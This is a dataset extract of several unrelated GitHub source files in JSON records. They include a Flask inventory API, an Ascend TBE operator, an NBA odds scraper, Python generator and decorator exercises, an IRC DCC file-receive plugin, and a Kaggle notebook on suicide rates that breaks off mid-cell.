1.0),\n \"../../COURSEWORK_DATA/mapswithshit/map_0001.png\"\n)\n\ndraw_points_on_map(\n \"../../COURSEWORK_DATA/\\PARAMETER_MAPS/top_left/map_00001.png\",\n \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n (-6, 6, 0.0, 1.0),\n \"../../COURSEWORK_DATA/mapswithshit/map_8+1.png\"\n)\n\ndraw_points_on_map(\n \"../../COURSEWORK_DATA/\\PARAMETER_MAPS/top_left/map_16+1.png\",\n \"../../COURSEWORK_DATA/ATTRACTORS/points.json\",\n (-6, 6, 0.0, 1.0),\n \"../../COURSEWORK_DATA/mapswithshit/map_16+1.png\"\n)\n","repo_name":"modelflat/coursework","sub_path":"research/map_with_points.py","file_name":"map_with_points.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30833262893","text":"from api.db import db\nfrom api.models import User, Location, LocationMember, Item, ItemStock, \\\n ItemLog, ItemStockLog\nfrom api.auth import current_user_id\nfrom api.error import error\nfrom flask import Blueprint, request, jsonify, g\nfrom api.validation import list_parser, simple_parser\nfrom api.control import control\nfrom uuid import uuid4\n\nlocations = Blueprint('locations', __name__, url_prefix='/v1/locations')\n\n\n@locations.before_request\ndef prefetch_location():\n if 'location_id' in request.view_args:\n location_id = request.view_args['location_id']\n location = Location.query.get(location_id)\n if location_id is None:\n return error.not_found('Could not find location')\n g.location = location\n\n\n@locations.route('', methods=['POST'])\n@control.authorize(['user'])\ndef create_location():\n args = simple_parser() \\\n .add_argument('owner_id', required=True) \\\n .add_argument('name', required=True) \\\n .parse_args()\n\n owner_id = args['owner_id']\n\n user = User.query.get(owner_id)\n\n if user is None:\n return error.not_found('User not found')\n\n location = Location(owner_id=user.id, name=args['name'])\n\n db.session.add(location)\n db.session.commit()\n\n return jsonify(location.to_dict())\n\n\n@locations.route('', methods=['GET'])\n@control.authorize(['user'])\ndef list_locations():\n args = list_parser().parse_args()\n user_id = current_user_id()\n locations = Location \\\n .query \\\n .outerjoin(LocationMember) \\\n .filter(\n LocationMember.user_id == user_id or\n Location.owner_id == user_id) \\\n .offset(args['offset']) \\\n .limit(args['limit']) \\\n .all()\n\n return jsonify([location.to_dict() for location in locations])\n\n\n@locations.route('//members/', methods=['POST'])\n@control.authorize(['owner'])\ndef add_location_member(location_id, member_id):\n member = LocationMember(user_id=member_id, location_id=location_id)\n db.session.add(member)\n db.session.commit()\n return jsonify(member.to_dict())\n\n\n@locations.route('//members')\n@control.authorize(['location'])\ndef list_location_members(location_id):\n args = list_parser().parse_args()\n members = User \\\n .query \\\n .join(LocationMember, LocationMember.user_id == User.id) \\\n .filter(LocationMember.location_id == location_id) \\\n .offset(args['offset']) \\\n .limit(args['limit']) \\\n .all()\n\n return jsonify([member.to_dict() for member in members])\n\n\n@locations.route('//members/', methods=['DELETE'])\n@control.authorize(['owner'])\ndef delete_location_member(location_id, member_id):\n affected_records = LocationMember \\\n .query \\\n .filter(\n LocationMember.location_id == location_id\n and LocationMember.user_id == member_id) \\\n .delete()\n\n if affected_records < 1:\n return error.not_found(\n 'Cannot delete user as he is not a member of the location')\n return ('', 200)\n\n\n@locations.route('//items', methods=['POST'])\n@control.authorize(['location'])\ndef add_location_item(location_id):\n args = simple_parser() \\\n .add_argument('name', required=True) \\\n .add_argument('price', type=float, required=True) \\\n .add_argument('quantity', type=int, required=True) \\\n .parse_args()\n\n item = Item(name=args['name'], price=args['price'], version=str(uuid4()))\n db.session.add(item)\n db.session.flush()\n\n item_log = ItemLog(\n item_version=item.version,\n item_id=item.id,\n name=item.name,\n price=item.price\n )\n db.session.add(item_log)\n\n item_stock = ItemStock(\n item_id=item.id,\n location_id=location_id,\n quantity=args['quantity'],\n version=str(uuid4())\n )\n db.session.add(item_stock)\n db.session.flush()\n\n item_stock_log = ItemStockLog(\n item_id=item.id,\n item_version=item.version,\n item_stock_version=item_stock.version,\n location_id=item_stock.location_id,\n quantity=item_stock.quantity\n )\n db.session.add(item_stock_log)\n\n db.session.commit()\n\n return jsonify(item.with_stock(item_stock))\n\n\n@locations.route('//items/', methods=['PUT'])\n@control.authorize(['location'])\ndef update_location_item(location_id, item_id):\n item_modified = False\n stock_modfied = False\n\n args = simple_parser() \\\n .add_argument('name', required=True) \\\n .add_argument('price', type=float, required=True) \\\n .add_argument('quantity', type=int, required=True) \\\n .parse_args()\n\n item = Item.query.get(item_id)\n if item.name != args['name'] or item.name != args['price']:\n item_modified = True\n last_version = item.version\n item.name = args['name']\n item.price = args['price']\n item.version = str(uuid4())\n db.session.add(item)\n\n item_log = ItemLog(\n item_version=item.version,\n last_item_version=last_version,\n item_id=item.id,\n name=item.name,\n price=item.price\n )\n db.session.add(item_log)\n\n item_stock = ItemStock \\\n .query \\\n .filter(ItemStock.item_id == item_id) \\\n .first()\n\n if item_stock.quantity != args['quantity']:\n stock_modfied = True\n last_version = item_stock.version\n item_stock.version = str(uuid4())\n item_stock.quantity = args['quantity']\n db.session.add(item_stock)\n\n item_stock_log = ItemStockLog(\n item_id=item.id,\n item_version=item.version,\n item_stock_version=item_stock.version,\n last_item_stock_version=last_version,\n location_id=item_stock.location_id,\n quantity=args['quantity'])\n db.session.add(item_stock_log)\n\n db.session.commit()\n\n if not item_modified and not stock_modfied:\n return error.bad_request('Did not modify record.')\n else:\n return jsonify(item.with_stock(item_stock))\n\n\n@locations.route('//items', methods=['GET'])\n@control.authorize(['location'])\ndef list_location_items(location_id):\n parser = list_parser()\n args = parser.parse_args()\n items = db \\\n .session \\\n .query(Item, ItemStock) \\\n .join(ItemStock) \\\n .filter(ItemStock.location_id == location_id) \\\n .limit(args['limit']) \\\n .offset(args['offset']) \\\n .all()\n\n result = [item.with_stock(item_stock) for (item, item_stock) in items]\n\n return jsonify(result)\n","repo_name":"AGhost-7/stockpiler","sub_path":"api/api/routes/locations.py","file_name":"locations.py","file_ext":"py","file_size_in_byte":6649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8644052766","text":"import te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\nfrom te.utils.op_utils import *\n\n\n@fusion_manager.register(\"mul_no_nan\")\ndef mul_no_nan_compute(input_x1, input_x2, output_y, kernel_name=\"mul_no_nan\"):\n \"\"\"\n calculating data\n\n Parameters\n ----------\n input_x1 : TVM tensor\n the placeholder of input_x1\n input_x2 : TVM tensor\n the placeholder of input_x2\n output_y : dict\n dict of output_y, include keys(shape and dtype)\n kernel_name : str\n kernel name, default value is \"mul_no_nan\"\n\n Returns\n -------\n output tensor\n \"\"\"\n \"\"\"\n np.where(np.equal(y, 0.), np.zeros((), dtype=dtype), np.multiply(x, y))\n \"\"\"\n src_dtype = input_x1.dtype.lower()\n shape_x1 = te.lang.cce.util.shape_to_list(input_x1.shape)\n shape_x2 = te.lang.cce.util.shape_to_list(input_x2.shape)\n\n shape_x1, shape_x2, shape_max = util.produce_shapes(shape_x1, shape_x2)\n util.check_shape_size(shape_max, SHAPE_SIZE_LIMIT)\n input_x1 = te.lang.cce.broadcast(input_x1, shape_max)\n input_x2 = te.lang.cce.broadcast(input_x2, shape_max)\n\n mul_res = te.lang.cce.vmul(input_x1, input_x2)\n zero = tvm.const(0, dtype=src_dtype)\n zeros = te.lang.cce.broadcast(zero, shape_max)\n res = te.lang.cce.vcmpsel(input_x2,\n zeros,\n operation='eq',\n slhs=zeros,\n srhs=mul_res)\n return res\n\n\n@check_op_params(REQUIRED_INPUT, REQUIRED_INPUT, OPTION_OUTPUT, KERNEL_NAME)\ndef mul_no_nan(x1, x2, y, kernel_name=\"mul_no_nan\"):\n \"\"\"\n calculating data\n\n Parameters\n ----------\n x1 : dict\n shape and dtype of input1\n x2: dict\n shape and dtype of input2\n y : dict\n shape and dtype of output, should be same shape and type as input\n kernel_name : str\n kernel name, default value is \"mul_no_nan\"\n\n Returns\n -------\n None\n \"\"\"\n output_z = y\n shape_x1 = x1.get(\"shape\")\n shape_x2 = x2.get(\"shape\")\n\n check_tuple = (\"float16\", \"float32\", \"int32\")\n input_data_type = x1.get(\"dtype\").lower()\n check_dtype(input_data_type, check_tuple)\n\n shape_x, shape_y, shape_max = broadcast_shapes(shape_x1, shape_x2, param_name_input1=\"x1\", param_name_input2=\"x2\")\n if shape_x[-1] == 1 and shape_y[-1] == 1 and shape_max[-1] == 1:\n shape_x = shape_x if len(shape_x) == 1 else shape_x[:-1]\n shape_y = shape_y if len(shape_y) == 1 else shape_y[:-1]\n shape_max = shape_max if len(shape_max) == 1 else shape_max[:-1]\n\n check_shape(shape_max)\n\n reshape_x, reshape_y = refine_shapes_for_broadcast(shape_x, shape_y)\n data_x = tvm.placeholder(reshape_x, name=\"data_1\", dtype=input_data_type)\n data_y = tvm.placeholder(reshape_y, name=\"data_2\", dtype=input_data_type)\n res = mul_no_nan_compute(data_x, data_y, output_z, kernel_name)\n\n with tvm.target.cce():\n schedule = generic.auto_schedule(res)\n config = {\n \"print_ir\": False,\n \"name\": kernel_name,\n \"tensor_list\": (data_x, data_y, res)\n }\n te.lang.cce.cce_build_code(schedule, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/mul_no_nan.py","file_name":"mul_no_nan.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16096097828","text":"import csv\nimport sys\nimport json\nfrom datetime import datetime\nfrom lxml import html\nimport requests\nimport math_helper as mt\n\ndef build_price_dict():\n aDict = {}\n source = requests.get('https://www.bovada.lv/services/sports/event/v2/events/A/description/basketball/nba').json()\n length = len(source[0]['events'])\n for i in range(length):\n stuff = source[0]['events'][i]\n \n eventType = stuff['type']\n if eventType == \"GAMEEVENT\":\n event = stuff['description']\n try:\n print(stuff['displayGroups'][0]['markets'][0]['outcomes'][0]['price']['american'])\n away = stuff['displayGroups'][0]['markets'][0]['outcomes'][0]['price']['american']\n home = stuff['displayGroups'][0]['markets'][0]['outcomes'][1]['price']['american']\n aDict[event] = [away, home]\n except:\n aDict[event] = [0, 0]\n continue\n return aDict\n\ndef parse_prices(awayTeam, homeTeam, price_dict):\n for i in price_dict.keys():\n if awayTeam in i and homeTeam in i:\n return price_dict[i]\n\ndef get_team_location(team):\n return{\n 'GSW' : 'golden-state-warriors',\n 'MIL' : 'milwaukee-bucks',\n 'PHI' : 'philadelphia-76ers',\n 'NOP' : 'new-orleans-pelicans',\n 'OKC' : 'oklahoma-city-thunder',\n 'TOR' : 'toronto-raptors',\n 'LAC' : 'la-clippers',\n 'WAS' : 'washington-wizards',\n 'SAC' : 'sacramento-kings',\n 'POR' : 'portland-trail-blazers',\n 'HOU' : 'houston-rockets',\n 'BOS' : 'boston-celtics',\n 'SAS' : 'san-antonio-spurs',\n 'BRK' : 'brooklyn-nets',\n 'LAL' : 'los-angeles-lakers',\n 'DEN' : 'denver-nuggets',\n 'MIN' : 'minnesota-timberwolves',\n 'CHO' : 'charlotte-hornets',\n 'ATL' : 'atlanta-hawks',\n 'UTA' : 'utah-jazz',\n 'DAL' : 'dallas-mavericks',\n 'IND' : 'indiana-pacers',\n 'DET' : 'detroit-pistons',\n 'PHO' : 'phoenix-suns',\n 'ORL' : 'orlando-magic',\n 'NYK' : 'new-york-knicks',\n 'MIA' : 'miami-heat',\n 'CHI' : 'chicago-bulls',\n 'CLE' : 'cleveland-cavaliers',\n 'MEM' : 'memphis-grizzlies',\n }.get(team)\n\ndef get_team_long(team):\n return{\n 'GSW' : 'Golden State Warriors',\n 'MIL' : 'Milwaukee Bucks',\n 'PHI' : 'Philadelphia 76ers',\n 'NOP' : 'New Orleans Pelicans',\n 'OKC' : 'Oklahoma City Thunder',\n 'TOR' : 'Toronto Raptors',\n 'LAC' : 'Los Angeles Clippers',\n 'WAS' : 'Washington Wizards',\n 'SAC' : 'Sacramento Kings',\n 'POR' : 'Portland Trail Blazers',\n 'HOU' : 'Houston Rockets',\n 'BOS' : 'Boston Celtics',\n 'SAS' : 'San Antonio Spurs',\n 'BRK' : 'Brooklyn Nets',\n 'LAL' : 'Los Angeles Lakers',\n 'DEN' : 'Denver Nuggets',\n 'MIN' : 'Minnesota Timberwolves',\n 'CHO' : 'Charlotte Hornets',\n 'ATL' : 'Atlanta Hawks',\n 'UTA' : 'Utah Jazz',\n 'DAL' : 'Dallas Mavericks',\n 'IND' : 'Indiana Pacers',\n 'DET' : 'Detroit Pistons',\n 'PHO' : 'Phoenix Suns',\n 'ORL' : 'Orlando Magic',\n 'NYK' : 'New York Knicks',\n 'MIA' : 'Miami Heat',\n 'CHI' : 'Chicago Bulls',\n 'CLE' : 'Cleveland Cavaliers',\n 'MEM' : 'Memphis Grizzlies',\n }.get(team)\n\ndef get_record(tree):\n stuff = tree.xpath('//tr[@class=\"team-blockup-data\"]//td//p/text()')\n record = stuff[0]\n dash = record.find('-')\n wins = int(record[:dash])\n losses = int(record[dash+1:])\n return wins+losses\n\ndef calculate_moving_team_record(tree, numGames):\n toDateWins = tree.xpath('//tr//td[@data-stat=\"wins\"]/text()')\n listOfRecord = []\n nthGame = 0\n for i in range(0, numGames):\n nthGame += 1\n listOfRecord.append(int(toDateWins[i])/nthGame)\n return mt.trailing_weighted_average(listOfRecord, mt.create_triangle_num_list(numGames))\n\ndef parse_home_away(tree, numGames):\n results = tree.xpath('//tr//td/text()')\n awayWins = 0\n awayRecord = []\n awayGames = 0\n homeWins = 0\n homeRecord = []\n homeGames = 0\n for i in range((7 * numGames) - 1):\n if results[i] == '@':\n awayGames += 1\n if results[i + 1] == 'W':\n awayWins += 1\n awayRecord.append(awayWins)\n elif results[i + 1] == 'L':\n awayRecord.append(awayWins)\n if ('p' in results[i]) and (results[i+1] != '@'):\n homeGames += 1\n if results[i + 1] == 'W':\n homeWins += 1\n homeRecord.append(homeWins)\n elif results[i + 1] == 'L':\n homeRecord.append(homeWins)\n return awayRecord, homeRecord\n\ndef calculate_moving_awaygame_record(tree, numGames):\n awayRecord = parse_home_away(tree, numGames)[0]\n awayGames = len(awayRecord)\n listOfRecord = []\n nthGame = 0\n for i in range(0, awayGames):\n nthGame += 1 \n listOfRecord.append(awayRecord[i]/(nthGame))\n return mt.trailing_weighted_average(listOfRecord, mt.create_triangle_num_list(awayGames))\n\ndef calculate_moving_homegame_record(tree, numGames):\n homeRecord = parse_home_away(tree, numGames)[1]\n homeGames = len(homeRecord)\n listOfRecord = []\n nthGame = 0\n for i in range(0, homeGames):\n nthGame += 1\n listOfRecord.append(homeRecord[i]/nthGame)\n return mt.trailing_weighted_average(listOfRecord, mt.create_triangle_num_list(homeGames))\n\ndef calculate_pythagorean_expectation(tree, team):\n \"\"\"\n Final value will be a weighted average of pythagorean expectation over the season and\n the last 3 games.\n\n season- 70%\n last3 - 30%\n \"\"\"\n stats = tree.xpath('//table[@class=\"tr-table\"]//tr//td[@class=\"text-right\"]/text()')\n power = 8.9\n pointsFor = float(stats[3])\n pointsAgainst = float(stats[13])\n expectation = (pow(pointsFor, power))/(pow(pointsFor, power) + pow(pointsAgainst, power))\n return expectation\n\ndef write(homeTeam, awayTeam):\n homeLong = get_team_long(homeTeam)\n awayLong = get_team_long(awayTeam)\n price_dict = parse_prices(awayLong, homeLong, build_price_dict())\n try:\n page = requests.get('https://www.basketball-reference.com/teams/' + str(homeTeam) + '/2019_games.html')\n tree = html.fromstring(page.content)\n\n newPage = requests.get('https://www.teamrankings.com/nba/team/' + get_team_location(homeTeam) + '/')\n newTree = html.fromstring(newPage.content)\n \n awayPage = requests.get('https://www.basketball-reference.com/teams/' + str(awayTeam) + '/2019_games.html')\n awayTree = html.fromstring(awayPage.content)\n\n newPageAway = requests.get('https://www.teamrankings.com/nba/team/' + get_team_location(awayTeam) + '/')\n newTreeAway = html.fromstring(newPageAway.content)\n except:\n print(\"One or both teams entered does not exist!\")\n sys.exit(1)\n numGamesPlayed = get_record(newTree)\n numGamesPlayedAway = get_record(newTreeAway)\n homeTeamMovingRecord = calculate_moving_team_record(tree, numGamesPlayed)\n awayTeamMovingRecord = calculate_moving_team_record(awayTree, numGamesPlayedAway)\n\n homeTeamMovingHomeRecord = calculate_moving_homegame_record(tree, numGamesPlayed)\n awayTeamMovingAwayRecord = calculate_moving_awaygame_record(tree, numGamesPlayedAway)\n\n homeTeamPythagoreanExpectation = calculate_pythagorean_expectation(newTree, homeTeam)\n awayTeamPythagoreanExpectation = calculate_pythagorean_expectation(newTreeAway, awayTeam)\n \n today = datetime.today()\n print(price_dict)\n # print(today)\n # print(homeTeam)\n # print(homeTeamMovingRecord)\n # print(homeTeamMovingHomeRecord)\n # print(homeTeamPythagoreanExpectation)\n # print(price_dict) #home\n # print(awayTeam)\n # print(awayTeamMovingRecord)\n # print(awayTeamMovingAwayRecord)\n # print(awayTeamPythagoreanExpectation)\n # print(price_dict[0])\n\n\n \n with open('1920.csv', 'a') as csv_file:\n\n csv_writer = csv.writer(csv_file, delimiter=',')\n csv_writer.writerow([today, \n homeTeam, \n homeTeamMovingRecord, \n homeTeamMovingHomeRecord, \n homeTeamPythagoreanExpectation, \n price_dict[1], \n awayTeam, \n awayTeamMovingRecord, \n awayTeamMovingAwayRecord, \n awayTeamPythagoreanExpectation, \n price_dict[0]])\n \n\n","repo_name":"miller-ian/miller-fund","sub_path":"king_scraper.py","file_name":"king_scraper.py","file_ext":"py","file_size_in_byte":8681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28154711472","text":"from functools import wraps\n\n\ndef my_for(iterable, func):\n iterator = iter(iterable)\n while True:\n try:\n thing = next(iterator)\n except StopIteration:\n break\n else:\n func(thing)\n\n\ndef square(x):\n print(x*x)\n\n# it do not need an array with 4 million beat\n\n\ndef current_beat():\n nums = (1, 2, 3, 4)\n i = 0\n while True:\n if i > len(nums):\n i = 0\n yield nums[i]\n i += 1\n\n\ndef fib_gen(max):\n x, y = 0, 1\n count = 0\n while count < max:\n x, y = y, x + y\n yield y # it will reduce memory, if not we will need a list to store massive\n # of number (may be 1 million, 4 million or 1 billion), but it wil slower\n count += 1\n\n\ndef be_polite(fn):\n @wraps(fn) # you pass fn in here and call be_polite\n # be_polite return wrapper\n # so doc and name will be the func you called (wrapper)\n # to prevent it we use wraps\n def wrapper():\n \"\"\"I am a wrapper func\"\"\"\n print(f\"you are about to call: {fn.__name__}\")\n print(f\"here's the documentation: {fn.__doc__}\")\n print(\"What a pleasure to meet you!!\")\n fn()\n print(\"Have a great day!!\")\n return wrapper\n\n\ndef greet():\n print(\"My name is Hog!!\")\n\n\n@be_polite # <=> rage = be_polite(rage)\ndef rage():\n \"\"\" print something rage \"\"\"\n print(\"I hate you\")\n\n\nrage()\nprint(rage.__doc__)\nprint(rage.__name__)\n\n\nwrapper_greet = be_polite(greet)\n\n# if we @polite_rage we don't have to:\n# rage = be_polite(rage)\n\n\n# my_for([1, 2, 3, 4], square)\n","repo_name":"mhoang2004/learn-python","sub_path":"Iterator&Generator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40810381372","text":"from collections import deque\nstack = deque()\nn = int(input())\n\nans = [0] * 100000\nh = [0] * 100000\n\nfor i in range(1, n+1):\n h[i] = int(input())\n# 反向遍历牛的身高\nfor j in range(n, 0, -1):\n while stack and h[stack[-1]] <= h[j]:\n stack.pop()\n if not stack:\n ans[j] = 0\n else:\n ans[j] = stack[-1]\n stack.append(j)\nfor k in range(1, n+1):\n print(ans[k])\n","repo_name":"wan7yu/Python-code","sub_path":"洛谷/栈/p2947/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20147256622","text":"\"\"\"\nOverview\n========\n\nThis plugin is used to receive files automatically through dcc.\n\nUsage\n=====\n\nOnce this plugin is installed and a directory was set in your ameliarc then whatever files\nthat are sent to the bot it will be saved in directory that was chosen.\n\n\"\"\"\n\nfrom quickirc import send_msg, DccClient\nfrom os.path import isfile, join\nfrom untwisted.event import CLOSE, CONNECT_ERR, DONE\nfrom untwisted.iputils import long_to_ip\n\nclass Get(object):\n def __init__(self, server, folder):\n self.folder = folder\n server.add_map('DCC SEND', self.dcc_get)\n\n def dcc_get(self, server, xxx_todo_changeme, filename, address, port, size):\n \n (nick, user, host, \n target, msg) = xxx_todo_changeme\n path = join(self.folder, filename)\n\n if isfile(path): \n send_msg(server, nick, 'File already exists.')\n else:\n fd = open(path, 'wb')\n dccclient = DccClient(long_to_ip(int(address)), \n int(port), fd, int(size)) \n \n def is_done(dcclient, msg):\n send_msg(server, nick, msg)\n fd.close()\n \n dccclient.add_map(DONE, is_done, 'Done.')\n dccclient.add_map(CLOSE, lambda dccclient, ssock, err: is_done(ssock, 'Failed.'))\n dccclient.add_map(CONNECT_ERR, lambda dccclient, ssock, err: is_done(\"It couldn't connect.\"))\n \n \ninstall = Get\n\n\n\n\n\n\n\n\n","repo_name":"untwisted/amelia","sub_path":"ameliabot/plugins/dcc_get.py","file_name":"dcc_get.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10147310735","text":"#!/usr/bin/env python\n# coding: utf-8\n\n#

    General Analysis of Suicide Rates

    \n# \n#

    Our aim is to make general analysis of suicide rates and we will explain these rates in detail.

    \n# \n#

    \n# \n# Dataset Feature List\n# \n#

      \n#
    • country
    • \n#
    • year
    • \n#
    • sex
    • \n#
    • age
    • \n#
    • suicides_no
    • \n#
    • population
    • \n#
    • suicides/100k pop
    • \n#
    • country-year
    • \n#
    • HDI for year
    • \n#
    • gdp_for_year
    • \n#
    • gdp_per_capita
    • \n#
    • generation
    • \n# \n#
    \n# \n#

    \n# \n#

    References

    \n#

    Conclusion

    \n# \n#

    Last Updated : 12.05.2019

    \n#

    if you like it, please upvoted

    \n\n# In[ ]:\n\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport warnings\nwarnings.filterwarnings('ignore')\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\n\n# In[ ]:\n\n\n#dataset read operation\n#read_csv function is required to read the data.\ndata=pd.read_csv('../input/master.csv')\n\n# In[ ]:\n\n\n#show data first 5 rows\ndata.head()\n\n# In[ ]:\n\n\n#show data last 5 rows\ndata.tail()\n\n# In[ ]:\n\n\n#random rows in dataset\ndata.sample(5)\n\n# In[ ]:\n\n\ndata.sample(frac=0.1)\n\n# In[ ]:\n\n\n#Describe function includes analysis of all our numerical data. For this, count, mean, std, min,% 25,% 50,% 75, max values are given.\ndata.describe()\n\n# In[ ]:\n\n\ndata.iloc[:,1:5].describe()\n\n# In[ ]:\n\n\n#The info function shows the data types and numerical values of the features in our data set.\ndata.info()\n\n# In[ ]:\n\n\n#We will now set the headings of the feature values in the data set.\ndata.columns\n\n# In[ ]:\n\n\n#so,change the names of the column. Because there may be problems for future analysis.\ndata=data.rename(columns={'country':'Country','year':'Year','sex':'Gender','age':'Age','suicides_no':'SuicidesNo','population':'Population','suicides/100k pop':'Suicides100kPop','country-year':'CountryYear','HDI for year':'HDIForYear',' gdp_for_year ($) ':'GdpForYearMoney','gdp_per_capita ($)':'GdpPerCapitalMoney','generation':'Generation'})\n\n# In[ ]:\n\n\ndata.columns\n\n# In[ ]:\n\n\n#And, how many rows and columns are there for all data?\nprint('Data Shape :')\ndata.shape\n\n# In[ ]:\n\n\ndata.isnull().any()\n\n# In[ ]:\n\n\ndata.isnull().values.any()\n\n# In[ ]:\n\n\n#Now,I will check null on all data and If data has null, I will sum of null data's. In this way, how many missing data is in the data.\ndata.isnull().sum()\n\n# In[ ]:\n\n\n#As you can see, most of the HDIForYear value is empty. That's why I want this value deleted.\ndata=data.drop(['HDIForYear','CountryYear'],axis=1)\n\n# In[ ]:\n\n\n#Now start analysis, min year and max year will find them\nmin_year=min(data.Year)\nmax_year=max(data.Year)\nprint('Min Year :',min_year)\nprint('Max Year :',max_year)\n\n#1985 min year,2016 max year.\n\ndata_country=data[(data['Year']==min_year)]\n\ncountry_1985=data[(data['Year']==min_year)].Country.unique()\ncountry_1985_male=[]\ncountry_1985_female=[]\n\nfor country in country_1985:\n country_1985_male.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='male')]))\n country_1985_female.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='female')])) \n \n#We found the ratio of men and women who committed suicide in some countries in 1985 and we are now charting.\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_1985,x=country_1985_male,color='red')\nsns.barplot(y=country_1985,x=country_1985_female,color='yellow')\nplt.ylabel('Countries')\nplt.xlabel('Count Male vs Female')\nplt.title('1985 Year Suicide Rate Gender')\nplt.show()\n\n#Very odd all the rates came on an equal level. So let's do max year.\n\ndata_country=data[(data['Year']==max_year)]\n\ncountry_2016=data[(data['Year']==max_year)].Country.unique()\ncountry_2016_male=[]\ncountry_2016_female=[]\n\nfor country in country_2016:\n country_2016_male.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='male')]))\n country_2016_female.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='female')])) \n \n#We found the ratio of men and women who committed suicide in some countries in 1985 and we are now charting.\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_2016,x=country_2016_male,color='red')\nsns.barplot(y=country_2016,x=country_2016_female,color='yellow')\nplt.ylabel('Countries')\nplt.xlabel('Count Male vs Female')\nplt.title('2016 Year Suicide Rate Gender')\nplt.show()\n\n#

    While the suicide rate was widespread in more countries in 1985, this ratio has fallen considerably in 2016. Now let us examine the other features of these countries.

    \n\n# In[ ]:\n\n\ndata_country=data[(data['Year']==min_year)]\n\ncountry_1985_population=[]\n\nfor country in country_1985:\n country_1985_population.append(sum(data_country[(data_country['Country']==country)].Population)) \n\n#Now year 1985 find sum population every country\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_1985,x=country_1985_population)\nplt.xlabel('Population Count')\nplt.ylabel('Countries')\nplt.title('1985 Year Sum Population for Suicide Rate')\nplt.show()\n\n#######################################################\n\ndata_country=data[(data['Year']==max_year)]\n\ncountry_2016_population=[]\n\nfor country in country_2016:\n country_2016_population.append(sum(data_country[(data_country['Country']==country)].Population)) \n\n#Now year 1985 find sum population every country\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_2016,x=country_2016_population)\nplt.xlabel('Population Count')\nplt.ylabel('Countries')\nplt.title('2016 Year Sum Population for Suicide Rate')\nplt.show()\n\n\n#

    The values we found on the upper side give the total population we found in 1985 in 2016.

    \n\n# In[ ]:\n\n\nsuicideGender1985=data_country.groupby(['Country','Gender']).SuicidesNo.sum()\n\n# In[ ]:\n\n\nsuicideGender1985\n\n# In[ ]:\n\n\ndata_country=data[(data['Year']==min_year)]\n\ndata_age_5_14=[]\ndata_age_15_24=[]\ndata_age_25_34=[]\ndata_age_35_54=[]\ndata_age_55_74=[]\ndata_age_75=[]\n\nfor country in country_1985:\n data_age_5_14.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='5-14 years')]))\n data_age_15_24.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='15-24 years')]))\n data_age_25_34.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='25-34 years')]))\n data_age_35_54.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='35-54 years')]))\n data_age_55_74.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='55-74 years')]))\n data_age_75.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='75+ years')]))\n \n\n#######################################################\n\ndata_country=data[(data['Year']==max_year)]\n\ndata_age_5_14=[]\ndata_age_15_24=[]\ndata_age_25_34=[]\ndata_age_35_54=[]\ndata_age_55_74=[]\ndata_age_75=[]\n\nfor country in country_2016:\n data_age_5_14.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='5-14 years')]))\n data_age_15_24.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='15-24 years')]))\n data_age_25_34.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='25-34 years')]))\n data_age_35_54.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='35-54 years')]))\n data_age_55_74.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='55-74 years')]))\n data_age_75.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='75+ years')]))\n \n#there is an equal rate. We need to make the query process a little more complicated.\n\n# In[ ]:\n\n\nsns.countplot(data.Gender)\nplt.show()\n#there has been an even gender distribution.\n\n# In[ ]:\n\n\nplt.figure(figsize=(10,5))\nsns.countplot(data.Gender,hue=data.Age)\nplt.title('Gender & Age')\nplt.show()\n#there has been an even gender & hue age distribution.\n\n# In[ ]:\n\n\ndata.groupby('Age')['Gender'].count()\n\n# In[ ]:\n\n\nsns.barplot(x=data.groupby('Age')['Gender'].count().index,y=data.groupby('Age')['Gender'].count().values)\nplt.xticks(rotation=90)\nplt.show()\n\n# In[ ]:\n\n\nsuicidesNo=[]\nfor country in data.Country.unique():\n suicidesNo.append(sum(data[data['Country']==country].SuicidesNo)) \n\n# In[ 